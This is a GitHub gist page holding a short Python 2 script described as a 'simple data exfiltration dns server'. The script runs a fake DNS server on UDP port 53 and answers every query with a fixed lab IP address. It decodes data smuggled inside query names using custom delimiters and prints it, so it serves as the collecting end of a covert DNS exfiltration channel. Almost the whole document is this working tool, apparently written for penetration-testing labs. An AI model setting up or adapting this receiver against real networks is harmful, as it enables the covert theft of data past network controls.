Skip to content

Instantly share code, notes, and snippets.

@xct

xct/dnsrv.py Secret

Created March 7, 2019 19:23
Show Gist options
  • Save xct/45bc42a181b21ccca3e19f4c8212e1d8 to your computer and use it in GitHub Desktop.
Save xct/45bc42a181b21ccca3e19f4c8212e1d8 to your computer and use it in GitHub Desktop.
Simple data exfiltration dns server
#!/usr/bin/env python
# based on http://www.tranquilidadtecnologica.com/2006/04/servidor-fake-dns-en-python.html
import socket
class DNSQuery:
def __init__(self, data):
self.data=data
self.domain=''
tipo = (ord(data[2]) >> 3) & 15
if tipo == 0:
ini=12
lon=ord(data[ini])
while lon != 0:
self.domain+=data[ini+1:ini+lon+1]+'.'
ini+=lon+1
lon=ord(data[ini])
def request(self, ip):
packet=''
if self.domain:
packet+=self.data[:2] + "\x81\x80"
packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
packet+=self.data[12:]
packet+='\xc0\x0c'
packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
return packet
last = []
def uprint(self, text): # dont print same lines multiple times
if text in self.last:
return
else:
self.last.append(text)
print(text)
if len(self.last) > 4:
self.last = []
def pprint(self):
text = self.domain
text = text.replace("--"," ")
text = text.replace("~~","\n")
clean = []
for line in text.splitlines():
if "~!" in line:
cleaned = line.replace("~!", "")
#self.uprint(cleaned)
print(cleaned)
if __name__ == '__main__':
ip='10.10.16.46'
print 'FakeDNS:: dom.query. 60 IN A %s' % ip
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind(('',53))
try:
while 1:
data, addr = udps.recvfrom(1024)
p=DNSQuery(data)
udps.sendto(p.request(ip), addr)
p.pprint()
except KeyboardInterrupt:
print 'Done'
udps.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment